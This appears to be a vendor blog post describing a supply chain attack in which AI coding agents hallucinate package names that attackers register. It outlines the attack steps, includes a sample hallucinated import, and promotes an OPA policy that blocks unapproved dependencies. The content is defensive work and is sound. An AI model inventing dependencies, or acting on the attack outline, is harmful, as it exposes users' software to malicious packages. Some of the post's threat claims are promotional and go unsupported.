The Hallucinated Dependency: A New Type of Supply Chain Attack

What happens when your AI Developer decides to optimize imports and hallucinates a package name that a hacker has registered on npm?

Posted on January 25, 2025 by Cabin crew team

The Hallucinated Dependency: A New Type of Supply Chain Attack

The Hallucinated Dependency: A New Type of Supply Chain Attack

What happens when your AI Developer decides to optimize imports and hallucinates a package name that a hacker has registered on npm?

The XZ Utils Backdoor: A Human Attack

In March 2024, the open-source community discovered one of the most sophisticated supply chain attacks in history: the XZ Utils backdoor.

A malicious actor spent two years building trust in the community, contributing legitimate patches, and eventually gaining maintainer access. They then inserted a carefully obfuscated backdoor into the compression library used by millions of Linux systems.

This was human social engineering at its finest. It required:

  • Patience (2 years of legitimate contributions)
  • Technical skill (obfuscated C code)
  • Social manipulation (convincing existing maintainers to grant access)

The attack was eventually caught by a vigilant security researcher who noticed a 500ms delay in SSH connections.

The Next Attack: AI Incompetence

The XZ backdoor required a human attacker with deep technical knowledge and years of patience. The next supply chain attack will require neither.

Here’s how it works:

Step 1: AI Generates Code

Your AI coding agent is tasked with “improving import efficiency” in your Node.js application. It scans the codebase and decides to consolidate several utility functions into a single package.

It generates this code:

// Before
import { debounce } from 'lodash';
import { formatDate } from './utils/date';
import { validateEmail } from './utils/validation';

// After (AI-optimized)
import { debounce, formatDate, validateEmail } from 'lodash-utils-extended';

The AI has hallucinated a package name. lodash-utils-extended doesn’t exist. But the code looks clean, the imports are consolidated, and the PR passes your linter.

Step 2: Attacker Registers the Package

A malicious actor (or an automated bot) monitors npm for common hallucination patterns. They see that several AI-generated PRs are referencing lodash-utils-extended.

They register the package on npm:

npm publish lodash-utils-extended

The package contains:

  • The legitimate debounce function (copied from lodash)
  • Malicious versions of formatDate and validateEmail that exfiltrate data

Step 3: Your CI/CD Installs It

Your CI pipeline runs npm install. The package exists on npm, so it installs successfully. Your tests pass (the functions work correctly for normal inputs). The PR is merged.

Step 4: The Backdoor Activates

The malicious validateEmail function sends all email addresses to an attacker-controlled server. Your application is now leaking PII.

And here’s the kicker: This wasn’t a targeted attack. The attacker didn’t know your company existed. They just registered a plausible package name and waited for AI agents to hallucinate it.

Why Static Analysis Misses This

Traditional security tools (SAST, dependency scanners) won’t catch this because:

  1. The code is syntactically valid: It’s real JavaScript with real imports
  2. The package exists: It’s published on npm with a valid signature
  3. The functions work: They pass your unit tests
  4. There’s no CVE: The package is brand new

Your security scanner sees a new dependency and flags it for review. But your team sees:

  • A legitimate-looking package name
  • A small, focused library (not a red flag)
  • Code that works in testing

They approve it.

The Hallucination Attack Surface

This isn’t theoretical. AI coding agents are already hallucinating dependencies:

  • Python: requests-extended, pandas-utils, numpy-helpers
  • JavaScript: react-hooks-plus, express-middleware-common
  • Go: github.com/common/utils, github.com/helpers/string

Attackers are monitoring GitHub for these patterns and pre-registering packages.

Why Policy-as-Code is the Answer

At Cabin Crew, we solve this with Pre-Flight Checks—policy-as-code that validates artifacts before they’re executed.

Here’s an OPA policy that blocks new dependencies unless explicitly whitelisted:

package dependency_control

# Default deny
default allow = false

# Allow if dependency is in the approved list
allow {
  input.artifact.type == "package.json"
  new_deps := input.artifact.added_dependencies
  approved := data.approved_packages
  
  # Check that all new dependencies are approved
  count([dep | dep := new_deps[_]; not dep in approved]) == 0
}

# Deny with reason
deny[msg] {
  not allow
  new_deps := input.artifact.added_dependencies
  unapproved := [dep | dep := new_deps[_]; not dep in data.approved_packages]
  
  msg := sprintf("Unapproved dependencies detected: %v", [unapproved])
}

This policy runs before the PR is merged. If the AI hallucinates a dependency, the policy fails, and the workflow halts.

How Cabin Crew Catches This

When the AI generates the code, the Cabin Crew Orchestrator:

  1. Extracts the diff: Identifies that package.json has changed
  2. Parses new dependencies: Detects lodash-utils-extended
  3. Runs the policy: Checks against the approved package list
  4. Fails the check: lodash-utils-extended is not approved
  5. Blocks the PR: The code never reaches your repository

The AI can retry with a different approach, but it cannot introduce unapproved dependencies.

The Remediation Loop

Here’s where it gets interesting. Instead of just failing, the Orchestrator can feed the policy failure back to the AI:

{
  "status": "policy_failed",
  "reason": "Dependency 'lodash-utils-extended' is not in approved list",
  "suggestion": "Use only approved packages from data.approved_packages"
}

The AI sees this feedback and generates a new solution:

// Revised approach (AI self-corrected)
import { debounce } from 'lodash';
import { formatDate } from './utils/date';
import { validateEmail } from './utils/validation';

// Keep imports separate (policy compliant)

This creates a learning loop where the AI improves through policy feedback, rather than failing outright.

Real-World Impact

This isn’t just about npm. The same attack vector exists for:

  • Docker images: FROM node:18-alpine-extended
  • Python packages: import tensorflow-optimized
  • GitHub Actions: uses: actions/checkout-plus@v3
  • Terraform modules: source = "terraform-aws-modules/vpc-extended/aws"

Any ecosystem where:

  1. Packages can be registered permissionlessly
  2. AI agents generate dependency references
  3. Humans trust “it works in CI”

…is vulnerable.

The Broader Lesson

The XZ backdoor required a sophisticated human attacker. The hallucinated dependency attack requires no sophistication at all.

An attacker can:

  1. Monitor GitHub for AI-generated PRs
  2. Extract common hallucination patterns
  3. Register those packages on npm/PyPI/Docker Hub
  4. Wait for automated CI/CD to install them

This is supply chain squatting at scale.

How to Protect Yourself

If you’re deploying AI coding agents, you need:

  1. Dependency Whitelisting: Only allow approved packages
  2. Policy-as-Code: Validate artifacts before execution
  3. Audit Logs: Track what the AI tried to do (even if blocked)
  4. Remediation Loops: Let the AI self-correct based on policy feedback

This is what Cabin Crew’s Pre-Flight Checks provide.


The next supply chain attack won’t be sophisticated. It will be automated.

Are you ready?


Learn more about Pre-Flight Checks or explore the Cabin Crew Protocol.

End of Transmission

Questions? Insights? Join the crew in the briefing room.

Discuss n Github

Further Intelligence